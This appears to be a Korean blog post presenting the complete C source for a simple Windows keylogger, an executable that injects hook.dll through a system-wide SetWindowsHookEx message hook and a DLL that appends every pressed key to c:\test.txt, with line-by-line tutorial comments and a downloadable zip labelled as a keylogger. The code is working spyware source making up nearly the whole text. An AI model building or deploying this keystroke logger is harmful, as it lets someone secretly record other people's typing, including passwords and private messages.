proja.exe 소스코드 #include <windows.h> LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
HINSTANCE g_hInst;
LPCTSTR lpszClass = TEXT("Hacked by gh0st"); //hInstance 프로그램의 인스턴스핸들
//nCmdShow 프로그램이 실행될 형태이며 최소화,보통 모양 등이 전달
// APIENTRY 는 윈도우즈의 표준 호출규약인 __stdcall 사용 //아래의 Winmain 함수는 일반 C언어에서의 main과 같은 역할을 한다. 즉, 프로그램이 가장
// 먼저 실행되는 함수이다.
// Winmain 함수의 인자가 복잡한데 //간단히 설명해서 hInstance는 프로그램 자체의 포인터이고, hPrevInstance는 해당 프로그램이
//동시에 몇개가 실행되었는지 파악할 때 사용하는 변수 //lpszCmdParam은 argv와 같이 프로그램의 인자를 의미하고, 마지막으로 nCmdShow는 실행되는
//프로그램의 모양을 나타낸다.
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpszCmdParam, int nCmdShow)
{
HWND hWnd; //hWnd 윈도우 핸들
MSG Message; // 윈도우에서 발생하는 메시지들을 저장할 변수
WNDCLASS WndClass; // 화면에 생성할 윈도우 클래스 선언
g_hInst=hInstance;
WndClass.cbClsExtra=0;
WndClass.cbWndExtra=0;
WndClass.hbrBackground=(HBRUSH)GetStockObject(WHITE_BRUSH); // 메인 윈도우 배경색 지정
WndClass.hCursor=LoadCursor(NULL,IDC_ARROW); // 윈도우 안에서의 마우스 커서모양 IDC_ARROW 기본 모양인 화살표
WndClass.hIcon=LoadIcon(NULL,IDI_APPLICATION); //메인 윈도우 아이콘
WndClass.hInstance=hInstance; // 프로그램의 인스턴스
WndClass.lpfnWndProc=WndProc; // 이 윈도우에서 발생하는 메시지들을 처리할 함수를 지정
WndClass.lpszClassName=lpszClass; // 이 윈도우의 클래스 이름
WndClass.lpszMenuName=NULL; // 윈도우에 붙일 메뉴 지정
WndClass.style=CS_HREDRAW | CS_VREDRAW;
RegisterClass(&WndClass);
hWnd=CreateWindow(lpszClass,lpszClass,WS_OVERLAPPEDWINDOW,CW_USEDEFAULT,CW_USEDEFAULT,CW_USEDEFAULT,
CW_USEDEFAULT, NULL,(HMENU)NULL,hInstance,NULL); //첫번째 인자는 윈도우를 생성할 때 사용할 클래스명, 두번째 인자는 창의 타이틀바에 들어갈 문자열, 세번째 인자는
// 윈도우의 형태(여기선 기본) //네,다섯번째는 윈도우를 출력할 X,Y 좌표, 그다음 2개는 창의 좌 우 길이, 나머지 4개는 아래와 같다 // NULL: the parent of this window
// NULL: this application does not have a menu bar
// hInstance: the first parameter from WinMain
// NULL: not used in this application
ShowWindow(hWnd,nCmdShow); // 위에서 생성한 window를 화면에 출력
while(GetMessage(&Message,NULL,0,0))
{
TranslateMessage(&Message); // 메시지 번역
DispatchMessage(&Message); // 메시지 처리
}
return (int)Message.wParam;
}
// 위 while문은 윈도우 메시지 큐에서 가장 상위에 있는 메시지를 하나 뽑아와서 message 변수에 저장한 후,
// 그것을 번역한 다음 처리하는 // 과정을 담고 있다. 마지막 단계인 처리는 메시지를 메시지처리함수로 전달하는 역할을 한다.
LRESULT CALLBACK WndProc(HWND hWnd, UINT iMessage, WPARAM wParam, LPARAM IParam)
{
static HINSTANCE hinstDll; // LoadLibrary 반환값 저장 변수
HOOKPROC hGetMsgProc; // GetProcAddress 반환값 저장 변수
static HHOOK hKeyHook; //SetWindowsHookEx 반환값 저장변수 switch(iMessage){//발생한 메시지가 WM_CREATE 일 경우, 즉 윈도우창이 생성되었을 경우
case WM_CREATE: //LoadLibrary 함수는 인자로준 dll을 현재 프로세스의 주소공간으로 mapping 시켜서 사용할 수 있도록 해주는 API
//이다.
hinstDll = LoadLibrary("hook.dll"); // hook.dll load
if(!hinstDll){
MessageBox(hWnd, "hooker.dll을 로드할 수 없습니다.", "오류", MB_OK);
ExitProcess(1);
} // GetProcAddress를 이용하여 DLL에서 export한 함수를 가져온다. 즉 hook.dll에서 GetMsgProc 함수를 호출 hGetMsgProc = (HOOKPROC)GetProcAddress(hinstDll, "GetMsgProc");
if(!hGetMsgProc){
MessageBox(hWnd, "GetMsgProc 함수를 찾을 수 없습니다.", "오류", MB_OK);
FreeLibrary(hinstDll);
ExitProcess(1);
} // SetWindowsHookEx 함수는 자신의 훅 프로시저를 타 어플리케이션으의 훅 체인에 설치한다. 쉽게 말하면 타겟
// 프로그램의 윈도우 메시지 처리 프로시저 // 를 본인이 만든 윈도우 메시지 처리 프로시저로 변경 하는 것을 말한다. 메시지 프로시져 외에 여러가지
//시스템 콜을 후킹할 수 있다. // http://ontow.blog.me/140131028775 에서 인자값 확인
hKeyHook = SetWindowsHookEx(WH_GETMESSAGE, hGetMsgProc, hinstDll, 0);
if(!hKeyHook){
MessageBox(hWnd, "Hooking을 성공하지 못했습니다.", "오류", MB_OK);
FreeLibrary(hinstDll);
ExitProcess(1);
}
return 0; case WM_DESTROY:
PostQuitMessage(0);
return 0;
} //DefWindowProc 함수는 WndProc에서 처리하지 않은 나머지 메시지에 관한 처리
return(DefWindowProc(hWnd,iMessage,wParam,IParam)); } // 위 메시지를 처리하는 함수는 CALLBACK 타입으로 지정된다. CALLBACK 이라는 것은 이 함수가 사용자에
// 의해 호출되는 것이 아닌, 프로그램에 의해 호출되는 것을 의미한다. 즉 DispatchMessage() 함수에 의해
// 호출된다. 인자들을 살펴보면 hWnd는 이메시지가 발생한 윈도우가 어떤것 이었는지 말해주고, iMessage는
// 실제 발생한 메시지를 나타내며, 마지막 wParam과 IParam은 해당 메시지의 추가 옵션으로 이해하면된다. // 윈도우 메시지의 종류로 http://cafe.naver.com/pplus.cafe?iframe_url=/ArticleRead.nhn%3Farticleid=167&
// 여기서 확인 hook.dll 소스코드 // GetMsgProc 함수의 원형을 자세히보면 앞서 WndProc 라고 선언했던 CALLBACK 함수와 거의 비슷하다.
// 메시지가 발생했을때 // CALLBACK 함수로 전달된 인자들의 정보가 가공되어 이 GetMsgProc 함수로 전달된다. // SetWindowsHookEx 함수에 의해 윈도우 내에서 발생하는 모든 메시지가 위 함수를 한번 거친후 자신의
// 본래 작업을 실행하게 된다. // 즉 메시지발생->GetMsgProc처리->WndProc처리 #include <windows.h>
__declspec(dllexport) LRESULT CALLBACK GetMsgProc(INT nCode, WPARAM wp, LPARAM lp)
{// message에서 발생한 메시지를 얻는다 그리고 그 메시지가 WM_KEYDOWN 라면 if문 실행 if(((MSG*)lp)->message == (long)WM_KEYDOWN)
{
HANDLE hFile; // 핸들변수
DWORD dwWrite; // http://irontooth.tistory.com/117 확인
hFile = CreateFile("c:\\test.txt", GENERIC_WRITE, 0, NULL, OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL, NULL);
// http://blog.naver.com/zerolive_?Redirect=Log&logNo=10005814846 확인
SetFilePointer(hFile, 0, 0, FILE_END);
//http://irontooth.tistory.com/98 확인
WriteFile(hFile, &((MSG*)lp)->wParam, 1, &dwWrite, NULL);
//http://irontooth.tistory.com/117 확인
CloseHandle(hFile);
}
return TRUE;
}
| 
성현이-초간단키로거.zip
성현이-초간단키로거.zip
